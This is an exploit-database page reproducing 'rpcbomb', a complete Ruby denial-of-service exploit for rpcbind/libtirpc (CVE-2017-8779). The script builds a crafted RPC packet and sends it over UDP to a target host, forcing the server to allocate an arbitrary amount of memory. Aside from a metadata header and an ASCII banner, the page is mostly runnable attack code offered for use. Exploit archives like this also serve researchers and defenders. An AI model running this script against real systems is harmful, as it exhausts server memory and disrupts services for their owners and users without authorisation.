Advertisement






RPCBind / libtirpc Denial Of Service

CVE Category Price Severity
CVE-2017-8779 CWE-400 $4000 High
Author Risk Exploitation Type Date
Nils Sommer High Remote 2017-05-09
CPE
cpe:cpe:/a:libtirpc:libtirpc:1.0.3
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017050050

Below is a copy:

RPCBind / libtirpc Denial Of Service#!/usr/bin/ruby
#
# Source: https://raw.githubusercontent.com/guidovranken/rpcbomb/fe53048af2d4fb78c911e71a30f21afcffbbf5e1/rpcbomb.rb
#
# By Guido Vranken https://guidovranken.wordpress.com/
# Thanks to Sean Verity for writing an exploit in Ruby for an earlier
# vulnerability: https://www.exploit-db.com/exploits/26887/
# I've used it as a template.
 
require 'socket'
def usage
        abort "\nusage: ./rpcbomb.rb <target> <# bytes to allocate> [port]\n\n"
end
bomb = """
                               ` + # ,         
                           : @ @ @ @ @ @       
               @ @ ; . + @ @ @ .       @ @     
                 @ @ @ @ @ `           @ @     
                                 . `   @ #     
                     ; @ @ @ . : @ @ @ @       
                 @ @ @ @ @ @ @ @ @ @ @ ;       
               @ @ @ @ @ @ @ @ @ @ @ @ @ `     
             @ @ @ @ @ @ @ @ @ @ @ @ @ @ :     
           # @ @ @ @ @ @ @ @ @ @ @ @ @ '       
           @ @ @ @ @ @ @ @ @ @ @ @ @ @ @       
         . @ @ @ @ @ @ @ @ @ @ @ @ @ @ @       
         + @ @ @ @ @ @ @ @ @ @ @ @ @ @ @       
         + @ @ @ @ @ @ @ @ @ @ @ @ @ @ @       
         : @ @ @ @ @ @ @ @ @ @ @ @ @ @ @       
           @ @ @ @ @ @ @ @ @ @ @ @ @ @ @       
           @ @ @ @ @ @ @ @ @ @ @ @ @ @ ,       
             @ @ @ @ @ @ @ @ @ @ @ @ @         
             , @ @ @ @ @ @ @ @ @ @ @           
               ` @ @ @ @ @ @ @ @ @             
                   , @ @ @ @ @  
     r p c b o m b
 
     DoS exploit for *nix rpcbind/libtirpc.
 
     (c) 2017 Guido Vranken.
 
     https://guidovranken.wordpress.com/
 
"""
 
puts bomb
 
if ARGV.length >= 2
    begin
        host = ARGV[0]
        numBytes = Integer(ARGV[1])
        port = ARGV.length == 3 ? Integer(ARGV[2]) : 111
    rescue
        usage
    end
 
    pkt = [0].pack('N')         # xid
    pkt << [0].pack('N')        # message type CALL
    pkt << [2].pack('N')        # RPC version 2
    pkt << [100000].pack('N')   # Program
    pkt << [4].pack('N')        # Program version
    pkt << [9].pack('N')        # Procedure
    pkt << [0].pack('N')        # Credentials AUTH_NULL
    pkt << [0].pack('N')        # Credentials length 0
    pkt << [0].pack('N')        # Credentials AUTH_NULL
    pkt << [0].pack('N')        # Credentials length 0
    pkt << [0].pack('N')        # Program: 0
    pkt << [0].pack('N')        # Ver
    pkt << [4].pack('N')        # Proc
    pkt << [4].pack('N')        # Argument length
    pkt << [numBytes].pack('N') # Payload
 
    s = UDPSocket.new
    s.send(pkt, 0, host, port)
 
    sleep 1.5
 
    begin
        s.recvfrom_nonblock(9000)
    rescue
        puts "No response from server received."
        exit()
    end
 
    puts "Allocated #{numBytes} bytes at host #{host}:#{port}.\n" +
        "\nDamn it feels good to be a gangster.\n\n"
else
    usage
end

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum